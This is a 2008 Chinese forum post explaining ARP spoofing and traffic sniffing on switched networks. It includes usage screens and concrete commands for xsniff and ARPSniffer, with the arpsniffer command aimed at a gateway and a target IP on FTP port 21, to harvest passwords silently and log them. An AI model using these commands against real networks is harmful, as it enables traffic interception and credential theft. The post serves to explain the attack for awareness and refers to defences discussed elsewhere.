初生牛犊
残 缺 惪 (Tong) 、没 人 懂。
- 积分
- 98
|
上面我们已经提到原理,我们再看看,这里同样是c想嗅探a和b之间的通信,为此,c向a和b都发送假的应答包,告诉a-----b的mac地址是:0c:0c:0c:0c:0c:0c (这个其实是c的);同时告诉b------a的mac地址是:0c:0c:0c:0c:0c:0c。收到假的arp应该答后,a知道发给192.168.0.2的数据包应该发到mac地址为:0c:0c:0c:0c:0c:0c;而b也认为,发给192.168.0.1的数据包应该发到mac地址为0c:0c:0c:0c:0c:0c的机器。A和B都将其加入到arp缓存表中,这样就形成了一个中间转发的过程。但arp缓存表是动态更新的,一般两分钟没有新的信息更新,arp缓存表会自动去除,所以c就不停地向a和b发送这种假的arp响应包就让arp缓存表中一直保存着错误的映射表。
我们把上例扩展到机房里一个交换环境下来看,我们知道交换环境下的数据都要从网关进入进出,所以上例中的a主机换成网关,黑客们欺骗的就是目标主机与网关之间的通信,当这种arp错误映射表一直存在时,从网关到目标主机的数据包和目标主机的数据包都要从发起欺骗的这台服务器上经过,上面我们讲到了嗅探工具,黑客就利用在发起欺骗的这台服务器(通常是被入侵的服务器)开一个抓包工具并进行过滤获取敏感的数据,如ftp用户名和密码,pop密码,web密码,数据库密码等。这些通常都由软件来完成,并且软件是非常小巧的那种,也就是dos下运行的,避免被发现。我们在本地看一下黑客们常用的抓包工具:
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
D:\\>sniff
X-Sniffer v1.0 - simple sniffer for win2000
Code by glacier <glacier@xfocus.org>
http://www.xfocus.org
USAGE: xsniff <Options>
<Options> means:
-tcp : Output tcp packets
-udp : Output udp packets
-icmp : Output icmp Packets
-pass : Filter username/password
-hide : Run in background
-host : Resolve IP address to hostname
-addr <IP> : Output Packets when IP address equal to <IP>
-port <Port> : Output Packets when port equal to <Port>
-log <File> : Output to <File>
-asc : Decode Packets to ASCII
-hex : Decode Packets to HEX
Example:
xsiff.exe -pass -hide -log pass.log
xsiff.exe -tcp -udp -asc -addr 192.168.1.1
D:\\>
这是dos下运行的一个抓包工具,可以通过sniff.exe -pass -hide –port 21 –log pass.log来抓取本机21端口的pass包,并保存在pass.log中。
上图是是国外的一个arp欺骗工具,可以对一个机房同一交换下的所有机器同时进行欺骗,上图为在机房中的测试,可见危害之大。当然,我们上面看到的都是抓包的欺骗分开的两个软件,流光作者小榕写了一款软件将arp欺骗跟抓包完美的结合了起来,我们看一下这个软件。
C:\\WINDOWS\\system32\\sniff>arpsniffer
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]
当然这个软件得先装上wincap驱动,我们看上面上的参数,ip1为网关ip,ip2为要欺骗的ip,sniffer tcp port 为嗅探的端口,logfile为日志文件,netadp为网卡号,/ereset为可选项。我们先看下网关ip。
C:\\WINDOWS\\system32\\sniff>ipconfig
Windows IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 61.xxx.xxx.79
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.xxx.xxx.254
C:\\WINDOWS\\system32\\sniff>
假如我们要欺骗的ip为61.xxx.xxx.78,那么arpsniffer的格式为:
C:\\>arpsniffer 61.xxx.xxx.254 61.xxx.xxx.78 21 1.txt /reset
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: Intel(R) 8255x Based Network Connection
Enable IP Router....OK
Get 61.xxx.xxx.254 Hardware Address: 00-00-0c-07-ac-02
Get 61.xxx.xxx.78 Hardware Address: 00-b0-d0-22-10-cb
Get 61.xxx.xxx.79 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61.xxx.xxx.78: Mac of 61.xxx.xxx.78 ===> Mac of 61.139.1.79
Spoof 61.xxx.xxx.254: Mac of 61.xxx.xxx.254 ===> Mac of 61.139.1.79
Begin Sniffer.........
上面是抓得的pass包pass.txt的内容,我们可以看到有很多的ftp用户名和密码,这些都是对应该网站空间的帐号和密码,对一个网站来说没有什么安全性而言了。被攻击的服务器的数据包从网关进来都要经过黑客控制的这一台机器,黑客通过嗅控器抓包获得想要的目标机上的敏感信息,从而对靠抓得的密码对目标机进行入侵,这就是现在黑客流行的arp欺骗攻击手法全过程。签于篇幅不再途述会话劫持和ip欺骗等。对于这类攻击我们的防范在前面ip旁注栏里面已阐述。 |
|
发表于 2008-10-18 16:12:19